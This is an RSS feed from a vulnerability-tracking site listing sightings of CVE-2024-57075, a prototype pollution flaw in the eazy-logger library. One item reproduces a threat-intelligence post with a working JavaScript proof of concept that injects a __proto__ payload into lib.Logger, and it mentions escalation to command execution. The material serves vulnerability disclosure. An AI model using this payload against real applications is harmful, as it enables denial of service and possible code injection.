<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 19 Jul 2026 02:10:04 +0000</lastBuildDate>
    <item>
      <title>ac133d8a-c9c6-4398-b385-7ab7bb13f617</title>
      <link>https://vulnerability.circl.lu/sighting/ac133d8a-c9c6-4398-b385-7ab7bb13f617/export</link>
      <description>{"uuid": "ac133d8a-c9c6-4398-b385-7ab7bb13f617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-57075", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3796", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-57075\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A prototype pollution in the lib.Logger function of eazy-logger v4.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.\n\nAn attacker can supply a payload with `Object.prototype` setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.\n\nMoreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., `child_process.exec`, `eval`), it could enable an attacker to execute arbitrary commands within the application's context.\n\n## Proof of Concept\n\n```js\n(async () =&amp;gt; {\nconst lib = await import('eazy-logger');\nvar someObj = {}\nconsole.log(\"Before Attack: \", JSON.stringify({}.__proto__));\ntry {\n// for multiple functions, uncomment only one for each execution.\nlib.Logger (JSON.parse('{\"__proto__\":{\"pollutedKey\":123}}'))\n} catch (e) { }\nconsole.log(\"After Attack: \", JSON.stringify({}.__proto__));\ndelete Object.prototype.pollutedKey;\n})();\n```\n\ud83d\udccf Published: 2025-02-06T06:31:26Z\n\ud83d\udccf Modified: 2025-02-07T14:34:53Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-57075\n2. https://gist.github.com/tariqhawis/c601f7f85146510ca899a7406a03aba5\n3. https://github.com/shakyShane/eazy-logger", "creation_timestamp": "2025-02-07T15:02:10.000000Z"}</description>
      <content:encoded>{"uuid": "ac133d8a-c9c6-4398-b385-7ab7bb13f617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-57075", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3796", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-57075\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A prototype pollution in the lib.Logger function of eazy-logger v4.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.\n\nAn attacker can supply a payload with `Object.prototype` setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.\n\nMoreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., `child_process.exec`, `eval`), it could enable an attacker to execute arbitrary commands within the application's context.\n\n## Proof of Concept\n\n```js\n(async () =&amp;gt; {\nconst lib = await import('eazy-logger');\nvar someObj = {}\nconsole.log(\"Before Attack: \", JSON.stringify({}.__proto__));\ntry {\n// for multiple functions, uncomment only one for each execution.\nlib.Logger (JSON.parse('{\"__proto__\":{\"pollutedKey\":123}}'))\n} catch (e) { }\nconsole.log(\"After Attack: \", JSON.stringify({}.__proto__));\ndelete Object.prototype.pollutedKey;\n})();\n```\n\ud83d\udccf Published: 2025-02-06T06:31:26Z\n\ud83d\udccf Modified: 2025-02-07T14:34:53Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-57075\n2. https://gist.github.com/tariqhawis/c601f7f85146510ca899a7406a03aba5\n3. https://github.com/shakyShane/eazy-logger", "creation_timestamp": "2025-02-07T15:02:10.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/ac133d8a-c9c6-4398-b385-7ab7bb13f617/export</guid>
      <pubDate>Fri, 07 Feb 2025 15:02:10 +0000</pubDate>
    </item>
    <item>
      <title>08087e17-6483-42fb-889c-73a0ea338dc3</title>
      <link>https://vulnerability.circl.lu/sighting/08087e17-6483-42fb-889c-73a0ea338dc3/export</link>
      <description>{"uuid": "08087e17-6483-42fb-889c-73a0ea338dc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-57075", "type": "published-proof-of-concept", "source": "https://github.com/advisories/GHSA-r7jx-5m6m-cpg9", "content": "", "creation_timestamp": "2025-02-06T06:31:26.000000Z"}</description>
      <content:encoded>{"uuid": "08087e17-6483-42fb-889c-73a0ea338dc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-57075", "type": "published-proof-of-concept", "source": "https://github.com/advisories/GHSA-r7jx-5m6m-cpg9", "content": "", "creation_timestamp": "2025-02-06T06:31:26.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/08087e17-6483-42fb-889c-73a0ea338dc3/export</guid>
      <pubDate>Thu, 06 Feb 2025 06:31:26 +0000</pubDate>
    </item>
    <item>
      <title>fb8dba5c-ec78-46ab-9e6a-ef0f2935f4cd</title>
      <link>https://vulnerability.circl.lu/sighting/fb8dba5c-ec78-46ab-9e6a-ef0f2935f4cd/export</link>
      <description>{"uuid": "fb8dba5c-ec78-46ab-9e6a-ef0f2935f4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-57075", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhhlxm7vmt2n", "content": "", "creation_timestamp": "2025-02-05T22:16:48.071296Z"}</description>
      <content:encoded>{"uuid": "fb8dba5c-ec78-46ab-9e6a-ef0f2935f4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-57075", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhhlxm7vmt2n", "content": "", "creation_timestamp": "2025-02-05T22:16:48.071296Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/fb8dba5c-ec78-46ab-9e6a-ef0f2935f4cd/export</guid>
      <pubDate>Wed, 05 Feb 2025 22:16:48 +0000</pubDate>
    </item>
  </channel>
</rss>
